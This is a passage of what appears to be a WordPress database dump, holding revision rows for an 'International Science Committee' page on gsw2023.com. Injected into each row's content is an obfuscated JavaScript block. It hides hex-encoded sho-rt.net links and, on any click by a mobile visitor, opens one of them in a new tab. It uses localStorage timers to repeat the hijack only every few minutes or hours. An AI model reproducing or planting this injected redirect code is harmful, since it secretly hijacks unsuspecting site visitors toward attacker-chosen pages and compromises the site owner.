_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2022-11-04 20:57:10','2022-11-04 20:57:10','',2876,'https://gsw2023.com/?p=3014',0,'revision','',0),
(3015,1,'2022-11-04 20:57:26','2022-11-04 20:57:26','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" resized_image_dimensions=\"4x3\" image_paddings=\"15px 0px 15px 0px\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54, 55\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2022-11-04 20:57:26','2022-11-04 20:57:26','',2876,'https://gsw2023.com/?p=3015',0,'revision','',0),
(3016,1,'2022-11-04 20:58:06','2022-11-04 20:58:06','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" resized_image_dimensions=\"1x0\" image_paddings=\"15px 0px 15px 0px\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54, 55\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 